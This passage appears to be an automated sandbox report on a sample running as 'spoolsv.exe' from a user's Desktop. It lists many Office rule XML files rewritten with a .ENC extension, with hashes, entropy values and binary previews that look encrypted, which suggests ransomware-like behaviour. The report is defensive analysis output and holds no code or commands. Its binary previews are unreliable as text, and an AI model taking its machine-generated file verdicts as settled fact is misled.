                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...I..M.6.[.....)..%....\..".n....O... .*@.5..FP?.-C)sO..xD.D.$.AX#....}-...~../..."...2.j0..I..t<..^w..??.00.%....}[Mc..L.dK... .....Xy.}i..b.JH.Hf..U..C.l..sz...d..#_.....%...v...W...U{.:..c.......G!...G.O.....uXm.g..7..T".........~o....L+.{.^.f..K..lc......@x...d.N...8D^F8.2......K....'l..W....O)BlW<..V\.Q......p.6.!....C.5.|m.%!.........D.C.).L.......L.l.I.5..V..5P.cO..Q.s..Dy...F.vX[.hv..Cx[E...O.Y.D.....c.V.......M.1........-..d.W...,s-..}~....}w.,......Y.u-.)..E...EN.$...1}.+0R;....*.....E.Yj..%..).6.KeD.8Z....P...`.nUyLR{.$.m._.......~.,BTH,.z..@..BV..6.d.-...@..P.E..p...@8/.....V$..gF..Q.].mf........2!.O.B).w...1.w#.383...g..D..<.Z.c?.....Gh..a..... ..K[|..g~r..l..?2.H................hn..I...7...^.&.....6.u.Vr...../..j...)ZJ....y..,..-....p.......2..J@..T...`.........:_..?.=..V....;m.j..;Z...E.w......g..b$.....V....*?..S....H..*..?........6.u.8.>.>}.6.7.&.f[.%:.._S..SU...f...kX1.v.9O}...#

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule222042v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):560
                                                                                                                                                                                                                                                      Entropy (8bit):7.6289800577267055
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fm9ivZsojg3Ql1IHOambDo3bNZiAG/MvvsTvZYljPn:+Osojg3o1IHXmbM3bPiAAMv01wjPn
                                                                                                                                                                                                                                                      MD5:D98095FB1F812107B764CE6832A926A4
                                                                                                                                                                                                                                                      SHA1:0BA50848393036943C5D18AE50454FDB85DB9E2A
                                                                                                                                                                                                                                                      SHA-256:8996206E743FC7E273D2CB6A81A85A09645CCC43B337574813386381D18AB9F4
                                                                                                                                                                                                                                                      SHA-512:4CA89EFBCA72054D71AF008AB7A7371A23FB9C68198253C4A8244C5190993A6A3F811B30F04B2D070B0B60FD5E75C26FD4F98059E44B83E775F5DD6EDF1F8128
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...I.\s..{s.P..<...hG.M.-.'...5..;...[..RCR..LJ..G....=......o...{)..mN6.FA.j...`Lh.......e.G=...:..*4~.5]..E.HCE.../....d.^..w....fK.Fc..i.....(..J'.a..m..3+._g...a.v....Mg.KG.y....=....{OG.....lh.%O.w....<K.[O...=....+%..._.E;._.....2.F...{.p.v.G6......#d..........E.OhA........~..JS..=pr...o'...un"..Z!..8..j.....).S......!.5...p.,.gy..3....E&.~..\..z...} ...A:B-_...r..K...Z9..F.C>*..4.,.|q.g.m:.....t..N.J|.....L.gz.......42E.l.f..(.S.QIh?7.I]+.R.\.K1..*...."...U..X..X.$.q6.....U.........N

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule222043v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):624
                                                                                                                                                                                                                                                      Entropy (8bit):7.681082451211883
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fm9JHR1koKTqL/iWodtRtXsFtqJeJ0cLG4mcR9rVWoJUhNa:+jRtKTqLBoHRtcFDJ0cLG4mcRBUhc
                                                                                                                                                                                                                                                      MD5:47B6330F704BF4E515DAB1E18CC4685E
                                                                                                                                                                                                                                                      SHA1:C8D51B249D4342FAD34D5D18DDD7C79BF5D70C3B
                                                                                                                                                                                                                                                      SHA-256:71F0E4429E9A3C69A4FD49DEA1FF18E21FC034A8EEBED3A9E7150EEA58653F6E
                                                                                                                                                                                                                                                      SHA-512:E151DDE3233ED7304D76C392A63CCEF6FED619918E6801E6047E7567F5D11A2E9686B11B3977E1801F59751757FA9BC5824BEE39B58DBDCCEA1DFD8E2B24D8DB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...I..B.zF._X.....!...7..%..I...gz.(,,..v.m.Yp.C.:U.C$.d...IX".$az...z...s....y.....1...Z...Nn.@..f............M....e.....u.uS.........~Q..........*W.-.q9.\.Y....#%....9."+.sr......l..&...ff.......s3..$U......>....s.V..5s.g.........U....*...N.t5...x.@x`........fq...^.9..p..#..A..l..y..a........B.i.t..a.......yiC.0.>}F..p.9..@6i..Z*.../!{.<Nc...y.?.*.mG.pPO.?g.pg..w......c..J..>f..wC3.O..,8X...@.......u.....h..Td.{y..#".y.rf8..3b..]4.e...O.~3?C..O...[.#.DD...L?N.G<".$>,..|.c...pzn uE..'G;...F]h........^.W,0l..b7.C,.RE.".....yOF..R...x..`"..;

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule222049v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):816
                                                                                                                                                                                                                                                      Entropy (8bit):7.748461766426144
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmQ5iyfLp6USw4v2q085+Y3B+Xp1r2Kss8wLEtdi5W6/wMJN/iGuXbszgDXgSeAX:+Q5ikF1b4vM97XpBfXhAth+z/igz6
                                                                                                                                                                                                                                                      MD5:4EEBAF263750BFDFBB13B44F04F7AE02
                                                                                                                                                                                                                                                      SHA1:708C6CCE8D2B3E487F0096928FD31E143AE3D7E6
                                                                                                                                                                                                                                                      SHA-256:57FE2D869F997698A164D260AD326BFD46C35D60D0D9F30FC1322513302FE83D
                                                                                                                                                                                                                                                      SHA-512:3E530ED1A9D5F8F9F84FD4C42552C0541C8AD051B7584C3F6BE36A670B14297BD707BFC00274653D96B907A9295BBA58EB64FC14DE2C45FA5F206BDEE5372C4D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...I......w2n..7q..~.4..E"...s.}./..P....l...oJ.r......V..../..Q..:.n....K|..*..#......i..}*...T.J5+..?...../..0......t.~6.F.7.U.3...o........h...|...._.jA3..2..R.~.dg....Cp.U.3...(!l89..O2..t.i<......kA7...~.X.".u.x..0..^}.#..@T.YEDX.>.J..[.1..L.0...B...e.~..p4%...b..Q...X..D.._.%...}.....bR...8....b....7.x.....V..|."~.n....+.D..].Y.......1...M..@"b...,...^..G.G.X.^p~.NA...]..c..F....S....<=..?.G.....s....sB}.W)j./....J...U....TH.!}r..cIc!.....B...Z.r.N............KU.......k.3G.k..D....^0..,...7..VG.q.n....!...eQ3.==.a`+.?.....w...MU.!..#.,........e...'|>8..0.4..K...a.>.V.......4...=..Z[.#.w..jF,k".....y."...}.n..Q<.mZfn.....U....r.....I...n&....C....`..@.t.R...{2..8f/....]8.z.?u.W$..7.{/..Z........Y..'("wT.3.%.}V.....K

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule222100v7.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.863249743145301
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+DgaKBmSuTKw74pEEDDMtVfAY6OlHqxs/OHuNLhgeFV4NDDaFhPqkg6+:+Dga7xrkWEDDefAY6OlBOHuZyeruqFwn
                                                                                                                                                                                                                                                      MD5:EDA53EE40329C4292D3C67B17CD6E2FE
                                                                                                                                                                                                                                                      SHA1:26C3AAC9E8561B1CEA8F4618EE3247124CC3DB10
                                                                                                                                                                                                                                                      SHA-256:F598CB2B8D2521386C94627705540B431C490B3DD75040E1D2CCF3565E3A552C
                                                                                                                                                                                                                                                      SHA-512:E4CCA9786EE2ADCF085B793C3614358C45DDC234C5B7682007FA11C56E48E1B1F1DA8E46762F2BC6BC6D82646C48D423BDDC0E81F9CB0F523B4145D5F720963B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...I......8@\..-`/wb.b...L....;.)t...]..G.q.}...l.it.\."Q.7Wv}.....+.u*.UO...&.~.J......H..cz^&..2......W....W...@a.xn.1".\.s$...j..?.5.jR.....R....QAu.....o'..,....X........g.".. .G.q.(.2z...B.&R...\..K.li....>.Cv.....\'-...}.8..sA...y-|P....ns.....3.J-........q(....$&A.........;\.C...T.%...m.%N'N3F..b.:..=.-..5.f.*..^.@5g.)&.w.jN...P..kk.&.T..l......M.1@.l!..$._$.<..3..oh.CR...H..w.\..b...8.w..0_.....@.?.....7......Ux......."E..%%..&.Y.0;.nZBz[..@..=.:.X|..} .9,5l.P.D...z...R.......u.".!n..\D...v-&..'..*...n.f..d.....x....g..........\M....\.@.q....3B.;J.75...0....3.l.T.+Z$..t.b.w..T".v........h......,.Hn...@..m.4....5.#;.l....m.r%....)[...A&.O\.?a....?...q}....u..jcQ..8...%.....l*^..Q...Y.i...;z....bfcgcm{../.i..s.t..7L...Z..>.d.c..3Ak..o..V;....8n........Z.6..e.8.7.I...r.!....o`..iNV..na.\../!.[.FZ..v.Ol..v.ir-..6.......(7...]......x.sE./..}.....h\S..y.IoHWR..I....O...v.b.(.M...*F

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule222101v3.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1744
                                                                                                                                                                                                                                                      Entropy (8bit):7.896941590597242
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:+40b1Vpk1cwaddP2CS8fNcLfeTkSx+G/pMcj1j8M2Oqd:+405WcwaWCS8mLYxFWcZ8rD
                                                                                                                                                                                                                                                      MD5:9EC3D3E1C1FE0ABB381EBA52702CE4F8
                                                                                                                                                                                                                                                      SHA1:4ACE9F7F742A0FFD4774BD408EBF655C44615E84
                                                                                                                                                                                                                                                      SHA-256:622FC6678DF8B4EB7B62A07F0FE19FFB1D7D123CA0770DB9CE461B3AFCF728A2
                                                                                                                                                                                                                                                      SHA-512:FEE6EBDDAD3E27EEBF99CB832E968C50BD88A8C5B2B0EBFBF00E01ADC312D1EF0FC4AEC47576F9228316254B6C86DF6FC2F41676B3C1949C638F080DD9250E7E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...I......\..."......D....sV..5P..&.;-"X..P.._J@..&a;...i.Z a.c7uI.`..n.c..}.....ed.G.K..7.5.d._...m....7.~J..myzJ.Qh_.AQ..&..+&_.v.Z..).8...!.<.].v0T.N..x.]^..t....6...D..#^.w...`..n....z...,q.b..E..<d... {.....@..)..p`.....w.(...4.q:.....#m.t..0..F.)..>.....\.!.k.....5..f...P..b.../=_...c.......*.......O\.......z.......R.Y...g.2..F.=...+VB.,(C.{.E.~.FE...pD....B..f.....R<!...m.uk....j.O...h..VH..7....j.l....Y$.G.y...a...C..b*. .M..@.5..bs.....^t.U........(.]...1./....R.....x...........e.....q4N~.9.q.H.g}r..g..t.4.yj6...Yw..j.%..@...J.R....&q..=.a.&...r.U.......+.3...e.]..%o...@.....J.+..k..9..:....A..vSf......)E8C*.........O..-^O.o..........|...V*x.j...3..o.|...}p..El.C.k.S.....*....r4nO~5..H.r..eP:`.h~.L..).c).....z.]Th]....e_.....V.7...|...A....r.N.M.D7^.8.....Qg.(4..z?TB...T...2.D..lA.B3.....eW~g.W.K....P.R|....s.!&..N...mD. }.W........uE.S.ak.j.X....z.>d..q.B#M....E..N...N.T,N!+...%........R.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule222102v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1760
                                                                                                                                                                                                                                                      Entropy (8bit):7.899611589458013
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:+Vg6M93kV4pRVm2Nl7Swhf+Enrv78/wSaQeBo:+XS3kiPVm2Nl7vfnrgI3t6
                                                                                                                                                                                                                                                      MD5:8398F46CB28933E9EE85A402ED893C8B
                                                                                                                                                                                                                                                      SHA1:DFE6E72E3E16C0CE06AEE05E4FB93346C3C83CAA
                                                                                                                                                                                                                                                      SHA-256:ACB260817CEC6D256911A413EA8C04DF3D38D1B68EB22CB70B222C95FFF0396A
                                                                                                                                                                                                                                                      SHA-512:71299BABDC97A60BEDF1C94590090BAB643578CB7A06A059509518AEEA026744E70821F93501168109CBE6ED2DFC0689AC6C8807C870135C766A4152E73F8BA2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...I...+.b]^.O}...fp1Y.&..f..V'(,2N....<R..&.%,....5h.........V]..g.4.. ..B.......C......."`.{x.oXm.......M+.4.....$...b.z5..0.}.tX.x.8x....%,`......l......v.........\.O.]K.,K....p..c..s..0......h].....-....s.'3.nsO.>.1..3......{:q.[....5...'.3..R.....0..z.....{.......p..'...7.b.TL.....s.-.$..bjR.......i1.B..'kM.J@.;r.f..VuW....%...&...}...hX~...9K4v_.f.:.b.@.p.7kZ.1.......H..l..G...[/..|...t./....P...I.&.....PYk..nl="..H...*....Y....1u$O.VC....{a...hs..q%4n...U[m....sU.O..'v..b". `?..y..R..t0.. .](..y.....t...!Uzo..V*..M.P.@w...F?.5.H..........vm.....t.OVC1}.-.....K.t9...P...W...#....5..4?.]..4........Z.m.W=t.#.....F.......4.U.~2:Y.0...C\....I.....k..n...`~.......a..d.U..7A.X....A...E.L.I.`....k.. ....<.A._.....'....x$+.q...f...-..7"2.V....F..c.n...)h.f..".'.....c...-Fg..F...I.Z...{.r.N.l.T.9..U.y......F...=....nrY......8.:".um...)5..`.G.........!.p-]:..t._A.iz.J...o...RW.B....%..:G.I.'...tl...2.olJ..AFX...X....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule222200v5.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1232
                                                                                                                                                                                                                                                      Entropy (8bit):7.824318827208985
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+t688Ku2MFPEbHbir/a3RTDxWka4VmqIlmdoD2nUWqK:+tPu2MFMjbo/ah5Wkd8qIlmdoynUWqK
                                                                                                                                                                                                                                                      MD5:9EF0C95A6C967CB5566895E19DFAFE21
                                                                                                                                                                                                                                                      SHA1:C1102A3658B50DF32DB710F118A1994EF3FB78B2
                                                                                                                                                                                                                                                      SHA-256:A0BCFC004D2776CA51011176091A383FE3276A1DFF36D9615322C7BB11F2ED6C
                                                                                                                                                                                                                                                      SHA-512:6EFBD5EB48DDD1B97540D47A77B9B257845CB9B5F497912BD3D6B2C65F62EE514A09B0E58110C4EC8B1E2EB355DF7C6F187E0EBCF0912D8564AE060AC0D26351
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...Iqj...F...C\.V..q.;.E.....*~-I..,..{....i........Xz.................j.....W.2.Q............cv.1...( ...8,P.&.E!.94...6Muu.>.%.($/.:.."T.C:.d\fI....J...J.. b.C..._...<..g...A.I.g..0mC...[^W.......o...C.........J.:b..yIN<.p:DT.)'..=1..+.".s..81..o...o...)......CV/.tuFL~.e..L....M.D.k.......9O.<...q.;.N...Y....QO.%.A.....;s=.u...~...f...tAZ....E.............^D~....'Z ....8.Q..M..V@.h.g_.....G '~,.oU.&pG..5..}t..C3~%.^Y.W..;g...._9.M..+.d+..._...N8qv..5.Uv8T..]#.....y..\....we....[.q.#C...q.3..*E+.....u.....v.....;8..+:H,..j..K...........v^.9..[..K.8.56..[..r.N?.{.Q.S.9.8..R*s.U..g4....f4X.:J.B...4...D..H.p..o.K..].pD..|...B..w..Qe...{....5...[.-..6..U...4.T..X.r_...e...v.eZ.JU=..o..)......S@VB.n.P`._..1(.......>W...B...m[b.h.mM...uM7"Om.F..3....A.i.....Ui6J.j.H..,...O...`yQ......<..{....T...ni.._.e..1.nz...t..8J.T....O..]y.i.`&^...$7+b.!;}E..\.ca...5O..wv.(..=g....t}Hh..^Z.=0...j_%A

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule224900v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):448
                                                                                                                                                                                                                                                      Entropy (8bit):7.533437497991608
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2JARGZV1mDFSYSPir7HyOaZXgPQw3QRV1vt1cztC+xpKTb:/NjJmxNSq6OSwP3gB8CWQP
                                                                                                                                                                                                                                                      MD5:ECAF1E5FF6877F15F9F2A2787D28DA15
                                                                                                                                                                                                                                                      SHA1:B418A81AAB4D696880C4761FC3F1EC9B2801159A
                                                                                                                                                                                                                                                      SHA-256:764C8828177290024519CCA4CB24BE92F8735D4AEFE0EC6A93A1124DB49D4EBE
                                                                                                                                                                                                                                                      SHA-512:F8CA6CFA43CA7070BD3D2A20DB4B7732948BFD9E79B5484FD2A1C576ED18054AE8A7B00E839E97488DCFE25E2752958337B1EC0D22261544B68D24C153AEEF52
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...q..@]...2..,(.T......b.3...W4-H.......i.........M7.6.o#...m.h0a.4.....Fi3.~E-{.F'..j.!Z........k..0M..Cd.T#.d..L..E..Q>#T..S..r...k..,..........i...t...O..B.6B}m......ex1x..b.F...|~P'w.....v#k..d....\..E....O........I..6E.|.S.W.P._....(.S..*$"....2....).1...{C!?......|B..C...G.pbS98.et..2.[....N.....F...^t.-.U.}Fd....I.f.w.....'...D(..[:...\.b..@'~..^F)....}p ...?f..=nrqyE.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule224901v11.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2288
                                                                                                                                                                                                                                                      Entropy (8bit):7.915482709547801
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:/v6ZaWfattSyd0vf7uk5WpUL058qUmyr6I7iRGS/pkNnK:wf6tSqOfSdALr6giRGShkNK
                                                                                                                                                                                                                                                      MD5:AD9B550416CC2F30A722A4E38CF51B67
                                                                                                                                                                                                                                                      SHA1:3E504CAC154ED48FF59B10FB00919D3DBD4E3704
                                                                                                                                                                                                                                                      SHA-256:1E78D9238750ECC7929773A2D9C3D4654625583886E1C1C2F0702CC81234BABB
                                                                                                                                                                                                                                                      SHA-512:ABDDC5B4B8F4A8D2B1B9E024E5D2ADEE41FE8FDD0AE6DF5A1EDFCC83924A0F05883975DB52C8FB8D5485E732EDD7F0706312EBDC0B8C1FE8E05109E2F9ED4D92
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....NSde....u-...%H.DX....M.U.b<....5.@...6.H..h...+..%.'.c.;...].....G.F..A..Nvd^.Y.........;.i..... #.[*p4...:t.x.2..L.R....H..L~..........(Qr..w..@4..BX/.Y..@."L.`7.s...O'......F..%.3.R:......K.9.y........5.Z.....T.(.=U....#.t.....*.....g.Wv.cs._S.J.?/....C.vH.NZw..q .H:*...e.ur......;../Y7..>M....NZ`Q...!.Lxhg..). ..,...[K.i.#...-...H.).}....]jU.X.m..g....s8..."o.....+..".R=|.C\.B...G...p.h.?....K.*.x.a p.w....A..j.w.!..v.+..t]8..%|k0..'.3.)....].......O..F5...9.)~.\..y.y*.I*eo. .t...:..+.sx"...="..$..<7..|t.Lt.[.@.....=..1..$..|...{...4.zJ.gv.e..:.T\.ue9.u.z.e..8nk..WC.n.z.yi.S..n..n..se.i.e.]8V$l...[...Z...BENF........7-......&.2V.}.^l,n......?$K..n.a/..-.q{0.c..[.A.7.=.\.....6%x.*H.+..%.".v....}...!.4........f#`?h..........K.......u.....8D/fy*.=86.......j.kO%...r..p.|......G..X...y..../..z.t.......[....].!Z..v...dI...e3e1...y&..;..wh.C..>...@];.C.W.J.=...z.)......Gu..j.....B..^.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule224902v2.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):464
                                                                                                                                                                                                                                                      Entropy (8bit):7.542014981258344
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2zxSYIwT6kbbdqYKAdG9AGDbJ+mNC6njgG5bIaK8k:/sPwWkbRKAdeAG3cIvTK8k
                                                                                                                                                                                                                                                      MD5:C0D226F34A4CEB2C78DF6014AE00FEB8
                                                                                                                                                                                                                                                      SHA1:F8A688CED870A933B4C24934CBF64A1DF6774E7A
                                                                                                                                                                                                                                                      SHA-256:0E9AD55F83FDF1073AF48937A273E7D68DAC94047BAC01552FA8DE7F924185C4
                                                                                                                                                                                                                                                      SHA-512:73EB2ADFB41BB52C297357D79B1B9141B96B2AAE4F8AF7AC008941FC1E5CF8870876E882180A80D733BD64D7BA1289A4F90973A8B8E9CFCCDB4E83F2F5A70309
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.|m..c.c.......L.#9.'=. E.m.Jr..c*.....e.M.A$hWj......\$@.P...yZ..CvI.>{.*..^_.`Z...R.@.....|.).x>....S.Bu.W.p..q.=....>.....vFm....p..o...Ei.J...0..F.pd.GU..r]..g......}..U...:.5Z...;.&..N..?.w..1.Z...0.._w...$.f.....a..).+.ov7..a80..Q.*h..T.e ...4{..~.3..g..#..*.....4...........<..0....U...!.&.h..}j?n.f.\..2.y..|-E...0...N...%....H_..d.p.$_..SCY..jb....%Cx!{...._......L-.4*..&d.2.A

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230104v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2816
                                                                                                                                                                                                                                                      Entropy (8bit):7.937308034225141
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:/E1okSCyA8I8/B8EURTWpZaFHDCUmznOUfjc6siHQboL15S7tneWvriwATMhG4Sg:EoxA8dBvUR4fmUpsiHgoJ5S3rivT2dYa
                                                                                                                                                                                                                                                      MD5:EF002456600BD277898029808FFFDFD6
                                                                                                                                                                                                                                                      SHA1:F6BA29A380B0A2EA557B1A7B34C60D7ABD5E0AC1
                                                                                                                                                                                                                                                      SHA-256:53AF760CAA2788AF7AEF034A022DF23C032BA8AD8E631D83E63CC30A0294E0D1
                                                                                                                                                                                                                                                      SHA-512:C9CCB388F8AFE37D5A0C46BAD64163414D7EBC555790AFC0016F82E517200DD646B6E5E68E647810B7F09691092780DFB8046D22354AB4B51363642316782563
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..E(..0...-.L.......s.I..C...J..`s3.o./..U..y...S.vl..t....Iw9.8..u)I..tN....}. ...C...S.e.O.X`...u.K..;..iz.Y2Q...l?).dN....5.j..-..$..q..m/ e...B...d.(..!.(...s{T"....Q.r..1.[...M..a.Q?.v....*.A"#...J..+..5....?......:../.`....K...o..__..~.Yca..7.k.........y.......z:D..5....C.f.w..d5 |.p..+...f.....Cp....A@...:.N/.z......K.Gt..."...A..Ui[b).y..^.[....`..<yCc@...)r........9PK.........`..P$.<..>...g:m.z;.e.d.?&UT?.E.......N...H..E1..?..+...Z'h.D..;f<.U.5.9.....U ..b.{>J.......V.Yh..A.NL..w..%....$. ..._..JA...U...\&..F..{c....T..O.g...`.FV#....bK}.....`?d.^.oa..6.n.......F......O5....A..M...W.r.,\...8........x.....].9....{..P..8.y."....6.5s..6.,c..........:....[p...~.B.((.v. e........v....F.......V\Q@/..^oI.r..Ck....Z..>.*...>.r.".M?..JVU.^!.u....w..'.5d>.&z..:..t...K.0}.2...-.{...cc..k....a.....t.f.}..<..p...../....k=.x..2.....HJ6q........Gs....L....DF.t..*.&.R..d.{3....)(

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230157v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1920
                                                                                                                                                                                                                                                      Entropy (8bit):7.891400264377954
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:/oX/nbT7yMWu2wu7dlwzoQp9LMG9jW2VH/k42P:wX/bXyEedlwzoi9LMyy2Vfk7P
                                                                                                                                                                                                                                                      MD5:09E18A73CAC11B8E569D07ABC8CBAE84
                                                                                                                                                                                                                                                      SHA1:E9C3CA8937C0B9916BFBE4E76ACE4E20E69CF005
                                                                                                                                                                                                                                                      SHA-256:F9A70710E42448158A3766B269797335CD0CD44A7BEF4E8C020CB480B9EAF166
                                                                                                                                                                                                                                                      SHA-512:C9E7D681B52AA65523D419708FFE3525E3A9A23284364BFFE52BE1A5C0669781C14FA8CE4D28CDFFA351B6BA38C961AFD619CA15455C200A3E55C9AAEA100100
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..<........W........O......!G...J........ /.N.>.....IA.._jW.N....J.%x...!..d67G]..........a..*..]#c.^_..B..$...ICF...4Ct{@.. .sf.(&Mg/...BU=....d..mfyDB{.v.Eo..p?...|..|.............>....."o...O.|.r..4v..QB...d....;......I.~V.z.Hq..m'...iD..N...2.......b$..T..2{...A.7...V....Y.ub..u.RT.KH..o.....0.*U.x.I..ato(...5.Bn\Z}S....R..TMO.Ri..".&G!..i..0.=.xXRt...%......~..km.g.....0....$.q.......,uG... .XH......1..)...^F..m0..g9t....`.l;.fdU.;...Ku..UyfR.98....Q......&.w$...?.......tZI...z..:.....f.._..\f$f......b.c;......".[.g.. .y].....jq.5.&fj.k...K.z.kL.....k..m.e....'s.........K.*M.g.wd.j.0:.g.."c6...+..b..6..I&...Y.P.uO........P......[;...I.&.%E..n:(..QC...L_..j..x.I.4.....Qu..MR_..<y.)..H7/...7H.....@...?...v.kM.`.oM..H..X)..<..L......<...n:.s.....i.D.~Z....G....-."..Y...SG.......-Q)\.d..lTS]. .O....ER....s....&d......}WY.VHv.."J0ww&...<..&-}.6*+LBL...~".V}j.-X.....l=.R..Ji...B..c,....lr..}..o.k...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230158v1.xml.ENC

